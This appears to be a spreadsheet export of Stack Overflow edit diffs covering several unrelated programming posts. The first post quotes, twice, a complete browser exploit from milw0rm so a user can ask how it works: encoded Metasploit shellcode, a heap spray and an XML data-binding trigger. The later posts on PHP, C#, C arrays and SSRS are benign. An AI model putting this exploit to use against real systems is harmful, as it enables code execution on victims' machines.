&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    // EXITFUNC=process, CMD=calc.exe_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    // ugly heap spray, the d0nkey way!_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    // works most of the time_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    var spray = unescape("%u0a0a%u0a0a");_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    do {_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;       spray += spray;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    } while(spray.length &amp;lt; 0xd0000);_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    memory = new Array();_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    for(i = 0; i &amp;lt; 100; i++)_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;       memory[i] = spray + shellcode;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    xmlcode = "&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;XML&lt;/span&gt; &lt;span class="hljs-attr"&gt;ID&lt;/span&gt;=&lt;span class="hljs-string"&gt;I&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;X&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;C&lt;/span&gt;&amp;gt;&lt;/span&gt;&amp;lt;![CDATA[&amp;lt;image SRC=http://&amp;amp;#x0a0a;&amp;amp;#x0a0a;.example.com&amp;gt;]]&amp;gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;C&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;X&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;XML&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;SPAN&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATASRC&lt;/span&gt;=&lt;span class="hljs-string"&gt;#I&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATAFLD&lt;/span&gt;=&lt;span class="hljs-string"&gt;C&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATAFORMATAS&lt;/span&gt;=&lt;span class="hljs-string"&gt;HTML&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;XML&lt;/span&gt; &lt;span class="hljs-attr"&gt;ID&lt;/span&gt;=&lt;span class="hljs-string"&gt;I&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;XML&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;SPAN&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATASRC&lt;/span&gt;=&lt;span class="hljs-string"&gt;#I&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATAFLD&lt;/span&gt;=&lt;span class="hljs-string"&gt;C&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATAFORMATAS&lt;/span&gt;=&lt;span class="hljs-string"&gt;HTML&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;SPAN&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;SPAN&lt;/span&gt;&amp;gt;&lt;/span&gt;";_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    tag = document.getElementById("replace");_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    tag.innerHTML = xmlcode;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;_x000D_
    &lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;script&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;html&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Here is what I believe it does and I would like you to help me for the part that I misunderstand.&lt;/p&gt; _x000D_
 &lt;p&gt; The variable &lt;code&gt;&lt;span class="diff-delete"&gt;shellcode&lt;/span&gt;&lt;/code&gt; contain the code to open the calc.exe I do not get it how they have found that weird string... any idea?&lt;/p&gt; _x000D_
 &lt;p&gt; The second thing is the variable &lt;code&gt;&lt;span class="diff-delete"&gt;spray&lt;/span&gt;&lt;/code&gt;. I do not understand this weird loop?&lt;/p&gt; _x000D_
 &lt;p&gt; The third thing is the variable &lt;code&gt;&lt;span class="diff-delete"&gt;memory&lt;/span&gt;&lt;/code&gt; that is never used anywhere, why do they create it?&lt;/p&gt; _x000D_
 &lt;p&gt; Last thing, What does the XML tag in the page? [1]: &lt;a href="http://www.milw0rm.com/exploits/7477" rel="nofollow noreferrer"&gt;http://www.milw0rm.com/exploits/7477&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I usually do not have difficulty to read &lt;span class="diff-add"&gt;Javascript&lt;/span&gt; script but this one I can't figure out the logic. The code is from an Exploit that has been published 4 days ago. You can find it at [milw0rm][1].&lt;/p&gt; _x000D_
 &lt;p&gt; Here is the code :&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;    &lt;/span&gt;&amp;lt;html&amp;gt;_x000D_
    &lt;span class="xml"&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;div&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"replace"&lt;/span&gt;&amp;gt;&lt;/span&gt;x&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;div&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
    &lt;span class="xml"&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;script&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="xml"&gt;_x000D_
    // windows/exec - 148 bytes_x000D_
    // http://www.metasploit.com_x000D_
    // Encoder: x86/shikata_ga_nai_x000D_
    // EXITFUNC=process, CMD=calc.exe_x000D_
    var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");_x000D_
_x000D_
    // ugly heap spray, the d0nkey way!_x000D_
    // works most of the time_x000D_
    var spray = unescape("%u0a0a%u0a0a");_x000D_
_x000D_
    do {_x000D_
       spray += spray;_x000D_
    } while(spray.length &amp;lt; 0xd0000);_x000D_
_x000D_
    memory = new Array();_x000D_
_x000D_
    for(i = 0; i &amp;lt; 100; i++)_x000D_
       memory[i] = spray + shellcode;_x000D_
_x000D_
    xmlcode = "&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;XML&lt;/span&gt; &lt;span class="hljs-attr"&gt;ID&lt;/span&gt;=&lt;span class="hljs-string"&gt;I&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;X&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;C&lt;/span&gt;&amp;gt;&lt;/span&gt;&amp;lt;![CDATA[&amp;lt;image SRC=http://&amp;amp;#x0a0a;&amp;amp;#x0a0a;.example.com&amp;gt;]]&amp;gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;C&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;X&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;XML&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;SPAN&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATASRC&lt;/span&gt;=&lt;span class="hljs-string"&gt;#I&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATAFLD&lt;/span&gt;=&lt;span class="hljs-string"&gt;C&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATAFORMATAS&lt;/span&gt;=&lt;span class="hljs-string"&gt;HTML&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;XML&lt;/span&gt; &lt;span class="hljs-attr"&gt;ID&lt;/span&gt;=&lt;span class="hljs-string"&gt;I&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;XML&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;SPAN&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATASRC&lt;/span&gt;=&lt;span class="hljs-string"&gt;#I&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATAFLD&lt;/span&gt;=&lt;span class="hljs-string"&gt;C&lt;/span&gt; &lt;span class="hljs-attr"&gt;DATAFORMATAS&lt;/span&gt;=&lt;span class="hljs-string"&gt;HTML&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;SPAN&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;SPAN&lt;/span&gt;&amp;gt;&lt;/span&gt;";_x000D_
_x000D_
    tag = document.getElementById("replace");_x000D_
    tag.innerHTML = xmlcode;_x000D_
_x000D_
    &lt;/span&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;script&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;html&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Here is what I believe it does and I would like you to help me for the part that I misunderstand.&lt;/p&gt; _x000D_
 &lt;p&gt; The variable &lt;strong&gt;&lt;span class="diff-add"&gt;shellcode&lt;/span&gt;&lt;/strong&gt; contain the code to open the calc.exe I do not get it how they have found that weird string... any idea?&lt;/p&gt; _x000D_
 &lt;p&gt; The second thing is the variable &lt;strong&gt;&lt;span class="diff-add"&gt;spray&lt;/span&gt;&lt;/strong&gt;. I do not understand this weird loop?&lt;/p&gt; _x000D_
 &lt;p&gt; The third thing is the variable &lt;strong&gt;&lt;span class="diff-add"&gt;memory&lt;/span&gt;&lt;/strong&gt; that is never used anywhere, why do they create it?&lt;/p&gt; _x000D_
 &lt;p&gt; Last thing, What does the XML tag in the page? [1]: &lt;a href="http://www.milw0rm.com/exploits/7477" rel="nofollow noreferrer"&gt;http://www.milw0rm.com/exploits/7477&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Paul Tomblin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;You&lt;/span&gt; can do &lt;code&gt;&lt;span class="diff-delete"&gt;if&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;/&lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;else&lt;/span&gt;&lt;/code&gt; statements like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php_x000D_
if ($something) {_x000D_
   echo 'one conditional line of code';_x000D_
   echo 'another conditional line of code';_x000D_
}_x000D_
_x000D_
_x000D_
if ($something) echo 'one conditional line of code';_x000D_
_x000D_
if ($something)_x000D_
echo 'one conditional line of code';_x000D_
echo 'a NON-conditional line of code'; // this line gets executed regardless of the value of $something_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;br&gt;&lt;br&gt; and then you can also write &lt;code&gt;&lt;span class="diff-delete"&gt;if&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;/&lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;else&lt;/span&gt;&lt;/code&gt; in an alternate syntax:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php_x000D_
if ($something):_x000D_
   echo 'one conditional line of code';_x000D_
   echo 'another conditional line of code';_x000D_
elseif ($somethingElse):_x000D_
   echo 'one conditional line of code';_x000D_
   echo 'another conditional line of code';_x000D_
else:_x000D_
   echo 'one conditional line of code';_x000D_
   echo 'another conditional line of code';_x000D_
endif;_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;br&gt;&lt;br&gt; &lt;span class="diff-delete"&gt;With&lt;/span&gt; the alternate syntax&lt;span class="diff-delete"&gt;,&lt;/span&gt; you can also fall out of parsing mode&lt;span class="diff-delete"&gt;,&lt;/span&gt; like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php_x000D_
if ($something):_x000D_
?&amp;gt;_x000D_
one conditional line of code&amp;lt;br /&amp;gt;_x000D_
another conditional line of code_x000D_
&amp;lt;?php_x000D_
else:_x000D_
   echo "it's value was: $value&amp;lt;br /&amp;gt;\n";_x000D_
?&amp;gt;_x000D_
another conditional line of code_x000D_
&amp;lt;?php_x000D_
endif;_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; But&lt;span class="diff-delete"&gt;,&lt;/span&gt; this gets really messy really fast and I won't recommend &lt;span class="diff-delete"&gt;its&lt;/span&gt; use (except maybe for template-logic).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;br&gt;&lt;br&gt; and to make it complete:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php_x000D_
$result = $something ? 'something was true' : 'something was false';_x000D_
echo $result;_x000D_
&lt;span class="diff-delete"&gt;echo "equals";&lt;/span&gt;_x000D_
if ($something) {_x000D_
   $result = 'something was true';_x000D_
} else {_x000D_
   $result = 'something was false';_x000D_
}_x000D_
echo $result;_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;you&lt;/span&gt; can do &lt;span class="diff-add"&gt;if else&lt;/span&gt; statements like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php_x000D_
if ($something) {_x000D_
   echo 'one conditional line of code';_x000D_
   echo 'another conditional line of code';_x000D_
}_x000D_
_x000D_
_x000D_
if ($something) echo 'one conditional line of code';_x000D_
_x000D_
if ($something)_x000D_
echo 'one conditional line of code';_x000D_
echo 'a NON-conditional line of code'; // this line gets executed regardless of the value of $something_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;br&gt;&lt;br&gt; and then you can also write&lt;span class="diff-add"&gt; if&lt;/span&gt; &lt;span class="diff-add"&gt;- else&lt;/span&gt; in an alternate syntax:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php_x000D_
if ($something):_x000D_
   echo 'one conditional line of code';_x000D_
   echo 'another conditional line of code';_x000D_
elseif ($somethingElse):_x000D_
   echo 'one conditional line of code';_x000D_
   echo 'another conditional line of code';_x000D_
else:_x000D_
   echo 'one conditional line of code';_x000D_
   echo 'another conditional line of code';_x000D_
endif;_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;br&gt;&lt;br&gt; &lt;span class="diff-add"&gt;with&lt;/span&gt; the alternate syntax you can also fall out of parsing mode like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php_x000D_
if ($something):_x000D_
?&amp;gt;_x000D_
one conditional line of code&amp;lt;br /&amp;gt;_x000D_
another conditional line of code_x000D_
&amp;lt;?php_x000D_
else:_x000D_
   echo "it's value was: $value&amp;lt;br /&amp;gt;\n";_x000D_
?&amp;gt;_x000D_
another conditional line of code_x000D_
&amp;lt;?php_x000D_
endif;_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; But this gets really messy really fast and I won't recommend &lt;span class="diff-add"&gt;it's&lt;/span&gt; use (except maybe for template-logic).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;br&gt;&lt;br&gt; and to make it complete:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php_x000D_
$result = $something ? 'something was true' : 'something was false';_x000D_
echo $result;_x000D_
&lt;span class="diff-add"&gt;?&amp;gt;_x000D_
_x000D_
equals_x000D_
_x000D_
&amp;lt;?php&lt;/span&gt;_x000D_
if ($something) {_x000D_
   $result = 'something was true';_x000D_
} else {_x000D_
   $result = 'something was false';_x000D_
}_x000D_
echo $result;_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>ReinstateMonica3167040</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Based on the first sentence of the question: &lt;em&gt;"I'm trying to write out a Byte[] array &lt;strong&gt;representing a complete file&lt;/strong&gt; to a file."&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The path of least resistance would be:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;File.WriteAllBytes(string &lt;span class="diff-delete"&gt;pathToAExistingFile&lt;/span&gt;, byte[] bytes)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Documented here:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/system.io.file.writeallbytes.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;System.IO.File.WriteAllBytes&lt;/code&gt; - MSDN&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Based on the first sentence of the question: &lt;em&gt;"I'm trying to write out a Byte[] array &lt;strong&gt;representing a complete file&lt;/strong&gt; to a file."&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The path of least resistance would be:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;File.WriteAllBytes(string &lt;span class="diff-add"&gt;path&lt;/span&gt;, byte[] bytes)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Documented here:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/system.io.file.writeallbytes.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;System.IO.File.WriteAllBytes&lt;/code&gt; - MSDN&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>kbtz</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; As Joel points out in &lt;a href="http://blog.stackoverflow.com/2008/12/podcast-34/"&gt;&lt;span class="diff-delete"&gt;Stack Overflow podcast #34&lt;/span&gt;&lt;/a&gt;, in &lt;a href="https://rads.stackoverflow.com/amzn/click/com/0131103628" rel="nofollow noreferrer"&gt;C Programming Language&lt;/a&gt; (aka: K &amp;amp; R), there is mention of this property of arrays in C: &lt;code&gt;&lt;span class="diff-delete"&gt;a[5] == 5[a]&lt;/span&gt;&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Joel says that it's because of pointer arithmetic but I still don't understand. Why does &lt;code&gt;&lt;span class="diff-delete"&gt;a[5] == 5[a]&lt;/span&gt;&lt;/code&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; The accepted answer is great. For a lower level view of how this works, see the comments section on that answer. There's a phenomenal conversation there about it. (This edit written about the comments available at the time. ie: the first ~16)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; As Joel points out in &lt;span class="diff-add"&gt;Stack Overflow podcast #34&lt;/span&gt;, in &lt;a href="https://rads.stackoverflow.com/amzn/click/com/0131103628" rel="nofollow noreferrer"&gt;C Programming Language&lt;/a&gt; (aka: K &amp;amp; R), there is mention of this property of arrays in C: &lt;span class="diff-add"&gt;a[5] == 5[a]&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Joel says that it's because of pointer arithmetic but I still don't understand. Why does&lt;span class="diff-add"&gt; a[5] == 5[a]&lt;/span&gt; ?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; The accepted answer is great. For a lower level view of how this works, see the comments section on that answer. There's a phenomenal conversation there about it. (This edit written about the comments available at the time. ie: the first ~16)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dinah</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a SSRS report and using &lt;code&gt;&lt;span class="diff-delete"&gt;PL/SQL&lt;/span&gt;&lt;/code&gt; for the dataset creation. My report needs two tables 1 one gives detailed view.(&lt;code&gt;&lt;span class="diff-delete"&gt;dataset 1&lt;/span&gt;&lt;/code&gt;) 2 one below that gives a summary table (data should come from the calculations based on the data in 1 table)&lt;/p&gt; _x000D_
 &lt;p&gt; I am using a temporary table for the &lt;code&gt;&lt;span class="diff-delete"&gt;dataset 1&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; What are the methods to get calculated result for &lt;code&gt;&lt;span class="diff-delete"&gt;dataset 2&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; I wrote 2 procedures for each. since first table is a temporary one i am not getting result for second dataset.&lt;/p&gt; _x000D_
 &lt;p&gt; Why can be the options.&lt;/p&gt; _x000D_
 &lt;p&gt; Can I have multiple &lt;code&gt;&lt;span class="diff-delete"&gt;dataset&lt;/span&gt;&lt;/code&gt; out of single procedure?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
